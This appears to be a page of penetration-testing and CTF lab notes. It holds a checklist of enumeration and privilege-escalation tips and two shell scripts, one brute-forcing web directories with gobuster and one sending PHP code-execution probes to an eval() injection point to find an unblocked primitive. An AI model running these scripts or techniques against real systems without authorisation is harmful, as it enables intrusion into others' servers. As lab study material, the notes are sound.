Hack$Notes

General Checklist

  • Check default passwords.

  • Check versions of services.

  • Try more than one wordlist when directory brute-forcing (e.g. /usr/share/wordlists/dirb/big.txt, /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt, /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt).

  • Once inside a CMS or site, check every single page.

  • bash vs sh: try both when doing privesc, because one does not imply the other. A sudo rule or SUID binary may allow /bin/sh but not /bin/bash (or the reverse), and bash itself drops an elevated effective UID unless it is started with -p.

  • SEARCH EVERYTHING, even if it seems silly (e.g. photos). Check even CSS files.

  • Check other exploits too if any are available; do not get stuck on one. The service may report version 2.4 and an exploit written for 2.5 may still work.

  • Enumerate subdomains if you are getting nothing.

  • Check the /opt and /var directories.

  • Intercept traffic with BurpSuite if you are stuck.

  • If you believe you have found the only way in, stick with it and keep researching it.

  • Run more than one privesc script (LinEnum, lse.sh, PEAS, etc.).

  • If you see http://10.10.10.10/index.php/ run gobuster/dirsearch against it. It may reveal a URL as http://10.10.10.10/index.php/admin/

  • Read the code. The details of what needs to be done or changed are in there. Just read the code!

  • For PHP command execution, try all of the primitives (shell_exec, system, exec, and also passthru, popen, proc_open) to be sure: disable_functions often blocks some of them and not others, so one failing call proves nothing.

  • If credentials are not working and you are sure they should, revert the box. It may have crashed somewhere along the way.

  • If you are 100% sure the exploit is the right one and it is not working, try the 64-bit or 32-bit build, depending on the architecture of the box (uname -m on Linux, systeminfo on Windows).

  • If a page redirects you, install the NoRedirect add-on in Firefox and add the page so it is not redirected. Also intercept the traffic with BurpSuite to see where it goes.

  • Execute commands manually. Automated scripts sometimes miss things.

  • Search and spend some time on LFI / URL parameters.

  • Running out of ideas? Brute-force may be the last option (use different lists, not only rockyou.txt).
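Putting the wordlist and index.php/ items above into one script, as an added example that is not code from the original notes: it rotates through several wordlists, skips any that are not installed, brute-forces both the site root and each front-controller prefix you pass (for example index.php/), and merges the hits so a path found by two lists is reported once. The three wordlist paths are the Kali defaults named in the list; gobuster (dir mode) is assumed to be installed, and the 10.10.10.10 target in the usage line is a placeholder.

```shell
#!/bin/sh
# Multi-wordlist directory brute-force helper (added example, not from the original notes).
# Assumes gobuster is installed; the wordlist paths are the Kali defaults from the checklist.

# Wordlists to rotate through, one per line; missing ones are skipped with a warning.
WORDLISTS="/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt"

# plan_targets BASE [PREFIX...]
# Prints the root URL plus one URL per prefix (e.g. index.php/), each ending in a slash,
# so paths that only exist behind a front controller are not missed.
plan_targets() {
    base=$(printf '%s' "$1" | sed 's#/*$##'); shift
    printf '%s/\n' "$base"
    for p in "$@"; do
        p=$(printf '%s' "$p" | sed 's#^/*##; s#/*$##')
        printf '%s/%s/\n' "$base" "$p"
    done
}

# available_lists prints only the wordlists that actually exist on this machine.
available_lists() {
    printf '%s\n' "$WORDLISTS" | while IFS= read -r w; do
        if [ -r "$w" ]; then
            printf '%s\n' "$w"
        else
            printf 'skip (missing): %s\n' "$w" >&2
        fi
    done
}

# brute BASE [PREFIX...]
# Runs gobuster once per (target, wordlist) pair and merges the results, so the same
# path found by two lists is printed once. Output lines are full URLs.
brute() {
    out=$(mktemp)
    plan_targets "$@" | while IFS= read -r target; do
        available_lists | while IFS= read -r list; do
            printf '[*] %s with %s\n' "$target" "$list" >&2
            # -q quiet, -z no progress bar; gobuster prints "/path (Status: NNN) [Size: N]"
            gobuster dir -u "$target" -w "$list" -x php,txt,html -q -z 2>/dev/null \
                | awk -v t="$target" '{ sub(/^\//, "", $1); print t $1 }' >> "$out"
        done
    done
    sort -u "$out"
    rm -f "$out"
}

# Usage: ./dirbrute.sh http://10.10.10.10 index.php/
if [ "$#" -gt 0 ]; then
    brute "$@"
fi
```

Pass as many prefixes as the application suggests (index.php/, app/, api/); each one is a separate gobuster run, so expect the total time to scale with targets times wordlists.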

As a general rule:

One finding leads to the next (e.g. found a file? It will lead you to the next step).
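An added example for the shell_exec/system/exec item in the list (not code from the original notes), generalised to the other PHP execution primitives: given an injection point where a GET parameter ends up in eval(), it sends one probe per primitive that prints a random marker and reports the first primitive whose response contains that marker. The URL and the parameter name cmd in the usage line are hypothetical; the point is that disable_functions commonly blocks some of these functions and not others, so a single failing call tells you nothing.

```shell
#!/bin/sh
# Find a working PHP command-execution primitive (added example, not from the original notes).
# Assumes you already have RCE-style injection: the value of a GET parameter is passed to
# eval() on the target. Target URL and parameter name are supplied by the caller.

PRIMITIVES="shell_exec system exec passthru popen proc_open"

# probe_payload FUNC MARKER
# Prints PHP that echoes MARKER using only FUNC. If FUNC is disabled or missing, PHP errors
# out and the marker never appears in the response.
probe_payload() {
    f=$1; m=$2
    case "$f" in
        shell_exec) printf "echo shell_exec('echo %s');" "$m" ;;
        system)     printf "system('echo %s');" "$m" ;;
        exec)       printf "exec('echo %s',\$o);echo implode('',\$o);" "$m" ;;
        passthru)   printf "passthru('echo %s');" "$m" ;;
        popen)      printf "\$h=popen('echo %s','r');echo fread(\$h,64);pclose(\$h);" "$m" ;;
        proc_open)  printf "\$p=proc_open('echo %s',array(1=>array('pipe','w')),\$pp);echo stream_get_contents(\$pp[1]);proc_close(\$p);" "$m" ;;
        *)          return 1 ;;
    esac
}

# find_primitive URL PARAM
# Sends each probe with curl (GET, URL-encoded) and prints the first primitive that works.
# Returns 1 if none does; then look at disable_functions / open_basedir in phpinfo().
find_primitive() {
    url=$1; param=$2
    # Random marker so a cached or echoed-back payload is not mistaken for execution.
    marker=$(head -c 8 /dev/urandom | od -An -tx1 | tr -d ' \n')
    for f in $PRIMITIVES; do
        body=$(curl -s -G --data-urlencode "$param=$(probe_payload "$f" "$marker")" "$url")
        if printf '%s' "$body" | grep -q "$marker"; then
            printf '%s\n' "$f"
            return 0
        fi
        printf '[-] %s: no output\n' "$f" >&2
    done
    return 1
}

# Usage: ./phpexec.sh 'http://10.10.10.10/vuln.php' cmd
if [ "$#" -eq 2 ]; then
    find_primitive "$1" "$2"
fi
```

The marker is generated per run and grepped for in the body rather than checking the HTTP status, because a disabled function usually still yields a 200 with a PHP warning (or nothing at all) in the page.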

Last updated 4 years ago